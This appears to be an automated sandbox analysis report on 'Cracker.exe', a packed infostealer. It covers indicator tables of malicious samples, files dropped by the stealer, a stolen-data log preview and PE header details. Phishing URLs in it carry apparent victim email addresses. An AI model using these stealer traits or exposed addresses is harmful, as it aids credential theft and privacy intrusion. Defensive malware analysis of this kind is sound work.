                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: Cracker.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | Jeyt1T7XTm.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm
149.154.167.220 | file.exe | malicious | XWorm
149.154.167.220 | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xqrhyulnFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/9lotF#c2ouY2hvaTFAaGRlbC5jby5rcg== | malicious | Unknown
149.154.167.220 | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xzgvjnkcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/E7B7K#kh.jang@hyundaimovex.com | malicious | Unknown
149.154.167.220 | vUWhc67uSc.exe | malicious | StormKitty
149.154.167.220 | vUWhc67uSc.exe | malicious | StormKitty
149.154.167.220 | ZF3dxapdNLa4lNL.doc | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | PO#7372732993039398372372973928392832973PDF.exe | malicious | GuLoader, Snake Keylogger
108.181.61.49 | Auftragsbest#U00e4tigung 20241107_pdf.com.exe | malicious | Quasar
108.181.61.49 | Bestellung - 20240001833.com.exe | malicious | Quasar
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | Jeyt1T7XTm.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm | 149.154.167.220
api.telegram.org | file.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xqrhyulnFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/9lotF#c2ouY2hvaTFAaGRlbC5jby5rcg== | malicious | Unknown | 149.154.167.220
api.telegram.org | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xzgvjnkcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/E7B7K#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
api.telegram.org | SecuriteInfo.com.Win32.MalwareX-gen.20028.17631.exe | malicious | AsyncRAT | 149.154.167.220
api.telegram.org | vUWhc67uSc.exe | malicious | StormKitty | 149.154.167.220
api.telegram.org | vUWhc67uSc.exe | malicious | StormKitty | 149.154.167.220
api.telegram.org | ZF3dxapdNLa4lNL.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
ipwho.is | Auftragsbest#U00e4tigung 20241107_pdf.com.exe | malicious | Quasar | 108.181.61.49
ipwho.is | DeGrsOm654.exe | malicious | Quasar | 195.201.57.90
ipwho.is | Bestellung - 20240001833.com.exe | malicious | Quasar | 108.181.61.49
ipwho.is | V7FWuG5Lct.exe | malicious | Quasar | 195.201.57.90
ipwho.is | 7ll96oOSBF.exe | malicious | Quasar | 195.201.57.90
ipwho.is | PQQmkT4xPT.exe | malicious | Quasar | 195.201.57.90
ipwho.is | aLboIGKNL5.exe | malicious | Quasar | 195.201.57.90
ipwho.is | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | 147.135.36.89
ipwho.is | V9fubyadY6.exe | malicious | Quasar | 195.201.57.90
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Jeyt1T7XTm.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm | 149.154.167.220
TELEGRAMRU | file.exe | malicious | XWorm | 149.154.167.220
TELEGRAMRU | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xqrhyulnFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/9lotF#c2ouY2hvaTFAaGRlbC5jby5rcg== | malicious | Unknown | 149.154.167.220
TELEGRAMRU | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xzgvjnkcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/E7B7K#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
TELEGRAMRU | vUWhc67uSc.exe | malicious | StormKitty | 149.154.167.220
TELEGRAMRU | vUWhc67uSc.exe | malicious | StormKitty | 149.154.167.220
TELEGRAMRU | ZF3dxapdNLa4lNL.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | PO#7372732993039398372372973928392832973PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
ASN852CA | hiss.mpsl.elf | malicious | Unknown | 50.99.143.232
ASN852CA | byte.arm7.elf | malicious | Mirai, Okiru | 161.184.40.161
ASN852CA | byte.sh4.elf | malicious | Mirai, Okiru | 206.75.104.133
ASN852CA | sora.ppc.elf | malicious | Unknown | 207.81.69.41
ASN852CA | Auftragsbest#U00e4tigung 20241107_pdf.com.exe | malicious | Quasar | 108.181.61.49
ASN852CA | e5AiOG6uDI.elf | malicious | Mirai, Moobot | 173.182.225.99
ASN852CA | nuklear.arm.elf | malicious | Mirai, Moobot | 75.159.38.52
ASN852CA | nuklear.arm.elf | malicious | Mirai, Moobot | 207.216.32.185
ASN852CA | Bestellung - 20240001833.com.exe | malicious | Quasar | 108.181.61.49
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | eQwUFcwrXk.lnk | malicious | Ducktail | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 4YgQ2xN41W.lnk | malicious | RDPWrap Tool, Ducktail | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | EERNI7eIS7.lnk | malicious | Ducktail | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | cOOhDuNWt7.lnk | malicious | Ducktail | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | O5PR3i6ILA.lnk | malicious | Ducktail | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk | malicious | Ducktail | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://support-facebook.kb.help/your-facebook-account-has-been-restricted/ | malicious | HTMLPhisher | 149.154.167.220
                                                    No context
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.773832331134527
                                                    Encrypted:false
                                                    SSDEEP:3:NlllulCl:NllUC
                                                    MD5:51407C7D0B358AFDE23AF44BEFFA0958
                                                    SHA1:376DAD3EDB07DFFB93ABD6CDD7ABD55033E21E07
                                                    SHA-256:FB87E24EA64BE629C9755B582962C4D97F7754D83FEE2BD673CB24985988318F
                                                    SHA-512:D0EA3008C9EC6649A587BEB64472555A36472DD049BEDC934CFD3417D01F562B64971DA3DCAC4095D7339EC228D0AE9C0523A99213C390BB2B3C1BBF3636FAA7
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e...........................................................
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.8475592208333753
                                                    Encrypted:false
                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):159744
                                                    Entropy (8bit):0.5394293526345721
                                                    Encrypted:false
                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):286
                                                    Entropy (8bit):5.767232012810563
                                                    Encrypted:false
                                                    SSDEEP:6:PkU6W3rzxbiEvcKGWlmIrBNuYraqWTfqgqlB1Hwsv7OjPn:cU9bzkEv7BdBNuMWfqnym7O7n
                                                    MD5:01074DEC455BFC7D979EEA418871413C
                                                    SHA1:8C2AA1FA48839290016BADCF927FD46EEEBC909A
                                                    SHA-256:A39398718E40F7B5639D3EC5335EFDF07A8DAC7036DC09A085A81F5C35185CE4
                                                    SHA-512:110C784EE4F1D57A4C8151F1AD838A1CC2E5BF87C5FE5F9EE81F0E5CC9642480BDB087375AB3F7A069215A076C229A573E70B8807EEA3527093C5C1CEE16774D
                                                    Malicious:false
                                                    Preview:.google.com.false./.true.13343559538131870.1P_JAR.2023-10-05-08...google.com.true./.true.13356778738131921.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):909412
                                                    Entropy (8bit):7.551322686397017
                                                    Encrypted:false
                                                    SSDEEP:12288:3IHaq3vcF6Vmf0ygWavkyqr5jSKzPSEDdYu+obWLbtEwoSCcA/8zeppDAaIwis5x:3ItPVm85qr5jtzPdDdY6bJScjiUx
                                                    MD5:5C75257120C226EE420A3EB2BEDC41CB
                                                    SHA1:439F188851B260B7AED5CC8B76B99341D3C7AC71
                                                    SHA-256:CACFB3E2F087E5B485D6F0C38C28D942DBBD6BB52685190A1AE19C9C393D52BA
                                                    SHA-512:1EDB61B19A979BF46E66A3BB64C7431DB19FC37656D839532953B797697AD6DFB4E1FBA3547F8C9DFC5EF93BC1C7171A6AA0125A2DC360E1D7005ED3A8CAEBC0
                                                    Malicious:false
                                                    Preview:.PNG........IHDR................C...+IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                    Category:dropped
                                                    Size (bytes):22466
                                                    Entropy (8bit):7.84152039990611
                                                    Encrypted:false
                                                    SSDEEP:384:snZTcGKx9Zh9tnVS38uVS38M/knZTcGKx9Zh9tnVS38uVS38M/Xw:sn+GKxDhX9+Mcn+GKxDhX9+MI
                                                    MD5:802D4D78AF9EBAAC40883960E962C014
                                                    SHA1:270F0A639E3E4B634CDE83F755FBBEE833E766AC
                                                    SHA-256:1A163D89833665304EC1514C45F7D1ACB9128DDAAD220A50EAC7F8A4EAD846DE
                                                    SHA-512:4F0E90EE289EEB9313D90B46267ECD067AC5C5872E6B69E1F31D00A7C8A6FC0F72A719B66FB0586AA6B23774DE93DA9002385495CE4DAA4E9D41075EF007814C
                                                    Malicious:false
                                                    Preview:PK.........^hYA.]............EFOYFBOLXA.png..In@!.C..z.0C ..~...Re...u.s......o.v.!...4...Z...w...dgg....../.i3$......a..O.....-A9r.&..?..K@Zt1.no.7UL..^.b&......p.S.Ua6"..]i...e.5..f.p..k..G.%..LI...a.....|...E.}..G....>.....yS..=...0p...YQ...j ..H...$......).i.....]S.C...W..*..1....u.....t.a%....D.....0...R.O..g3....;Z=;<CG.D8..Z.Sjf....[...V.(z...e...~ZY.....W...R.^..+5..p..{^. .G.us.....{.M.z...s.....<.T....o.jv...."4..c....2.c0e.s.6.:{....6..Dk.[...Y.i.z.c.-.Rq9a..s.t..>}..'kBo.\...Z...Q..J..6.....q.h@7s.....%..'.n.v.dK..X..{u..~B.:.-r...Uox.h.8.._A.[Q....P....Q"....3AV..i...g.....5...|...Owoh......@l.....d.Cv~[.S...V5^..f..+.G..\.....PK.........^hY..d)............GAOBCVIQIJ.png..I.E!.E...GE.^......r.....B.ha.6...j5....CgC.k.....w#.-U...;....4.KB..dL.......zQo....m...oV2..~...Lm....`}@4..PQ<...L"-...d...j}}....u'............Cn...3h.....g*....V.+..i..o..=...E.d.:......)$..>Kb....x.:)....,.....#..{$.Bni...:Gc.....U...Z..r+...u...
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):663
                                                    Entropy (8bit):5.347368821663218
                                                    Encrypted:false
                                                    SSDEEP:12:eM367QN3e1oQQ84xx6YIrJFrtlQM7NlVDeBQM3aWfgyIHdAMij01+XaBLF:ex0NkhWxxVyqM7NlVae8dOAMijU+qBLF
                                                    MD5:2C69CE6A65E90F9454B876240A4CA2A2
                                                    SHA1:26B74B4E32513FEAC9F11AF2178C5A94C94AECFD
                                                    SHA-256:CC0F6AC94A3ACD23CB80A7CE6AAC9A75680EF9B7F58C008CFD6AD686018BA4F1
                                                    SHA-512:708878DC8C171A3703CB22EC259DFFBC3CE703E627A9BF3C48A8AE76AFD024EDE49888762A9657276B505541BA98A33F4238A8804160FB98DE8772FA0474E5B6
                                                    Malicious:false
                                                    Preview:..- IP Info -....IP: 173.254.250.90..Country: United States..City: Dallas..Postal: 75201..ISP: Quadranet Enterprises LLC - A8100..Timezone: -06:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - 3CYSMP (1280, 1024)..HWID: 7263582169614543..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\Cracker.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 30...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Others: ..
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1373607036346451
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                    Category:dropped
                                                    Size (bytes):935759
                                                    Entropy (8bit):7.568960594662551
                                                    Encrypted:false
                                                    SSDEEP:12288:vIHaq3vcF6Vmf0ygWavkyqr5jSKzPSEDdYu+obWLbtEwoSCcA/8zeppDAaIwis5k:vItPVm85qr5jtzPdDdY6bJScjiUk
                                                    MD5:B170D60627B704E816DDA34424444A40
                                                    SHA1:BD79C741E8A021A43EA3B457C4796FC5F8BACAEE
                                                    SHA-256:11961873AC2D0B46ED17A679967747CCDE707433769B0E9650A6CB77F08DC6D0
                                                    SHA-512:A2270AFEF82114EAC0AFD925572E9C3B13CB815E93E4D31D78D64FFD1982113CA6FFF4638C2A23D5FD6E7634F0E4D1A38F1DE815A8709BB58B5A72D2999C423C
                                                    Malicious:false
                                                    Preview:PK.........^hY................Autofill/PK.........^hY................Cookies/PK.........^hY................CreditCards/PK.........^hY................Downloads/PK.........^hY................History/PK.........^hY................Passwords/PK.........^hYh.^d...d.......screen1.png.PNG........IHDR................C...+IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                    Category:dropped
                                                    Size (bytes):22466
                                                    Entropy (8bit):7.84152039990611
                                                    Encrypted:false
                                                    SSDEEP:384:snZTcGKx9Zh9tnVS38uVS38M/knZTcGKx9Zh9tnVS38uVS38M/Xw:sn+GKxDhX9+Mcn+GKxDhX9+MI
                                                    MD5:802D4D78AF9EBAAC40883960E962C014
                                                    SHA1:270F0A639E3E4B634CDE83F755FBBEE833E766AC
                                                    SHA-256:1A163D89833665304EC1514C45F7D1ACB9128DDAAD220A50EAC7F8A4EAD846DE
                                                    SHA-512:4F0E90EE289EEB9313D90B46267ECD067AC5C5872E6B69E1F31D00A7C8A6FC0F72A719B66FB0586AA6B23774DE93DA9002385495CE4DAA4E9D41075EF007814C
                                                    Malicious:false
                                                    Preview:PK.........^hYA.]............EFOYFBOLXA.png..In@!.C..z.0C ..~...Re...u.s......o.v.!...4...Z...w...dgg....../.i3$......a..O.....-A9r.&..?..K@Zt1.no.7UL..^.b&......p.S.Ua6"..]i...e.5..f.p..k..G.%..LI...a.....|...E.}..G....>.....yS..=...0p...YQ...j ..H...$......).i.....]S.C...W..*..1....u.....t.a%....D.....0...R.O..g3....;Z=;<CG.D8..Z.Sjf....[...V.(z...e...~ZY.....W...R.^..+5..p..{^. .G.us.....{.M.z...s.....<.T....o.jv...."4..c....2.c0e.s.6.:{....6..Dk.[...Y.i.z.c.-.Rq9a..s.t..>}..'kBo.\...Z...Q..J..6.....q.h@7s.....%..'.n.v.dK..X..{u..~B.:.-r...Uox.h.8.._A.[Q....P....Q"....3AV..i...g.....5...|...Owoh......@l.....d.Cv~[.S...V5^..f..+.G..\.....PK.........^hY..d)............GAOBCVIQIJ.png..I.E!.E...GE.^......r.....B.ha.6...j5....CgC.k.....w#.-U...;....4.KB..dL.......zQo....m...oV2..~...Lm....`}@4..PQ<...L"-...d...j}}....u'............Cn...3h.....g*....V.+..i..o..=...E.d.:......)$..>Kb....x.:)....,.....#..{$.Bni...:Gc.....U...Z..r+...u...
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):0.017262956703125623
                                                    Encrypted:false
                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                    Malicious:false
                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):7.946417718933471
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 81.26%
                                                    • UPX compressed Win32 Executable (30571/9) 12.30%
                                                    • Win64 Executable (generic) (12005/4) 4.83%
                                                    • Generic Win/DOS Executable (2004/3) 0.81%
                                                    • DOS Executable Generic (2002/1) 0.81%
                                                    File name:Cracker.exe
                                                    File size:2'269'184 bytes
                                                    MD5:0f8507a31b1a48f31f26321c9762a513
                                                    SHA1:283e32ff498f529b4d1d8e9d0fecb44b7a219758
                                                    SHA256:b0bfae6412f70f426f3cbb56091f5cc157821b591a3391f68ddead55479f93c8
                                                    SHA512:3a53b924b0c3358fd0781eeb76f5141c586e51f54fb9e000866eb4c906235ce9b01e5c8903279f27791401a7d81f9db40afe3081d88952ae3a4ed955c3ab67cd
                                                    SSDEEP:49152:3gxqu3RcnLHx7FHNwA5VRp/KQiGH+7W7WFDus/3BcSJir2Vn:wQLVFthRhiY7Cus/3F4qV
                                                    TLSH:44B533FC1ED19073D8BED8FB6149D4E3448A723A5A8C82D74D7EDC4396B01A65E8C81E
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.dC?...?...?...6...-..._......._...2..._...6.......)...+...<...?.......[...%...?...8...[...>...Rich?..........................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x140545f00
                                                    Entrypoint Section:UPX1
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x672C8260 [Thu Nov 7 09:03:28 2024 UTC]
                                                    TLS Callbacks:0x405461a5, 0x1
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:e8effc9201cf1e60acc68af88aec3bd3
                                                    Instruction
                                                    push ebx
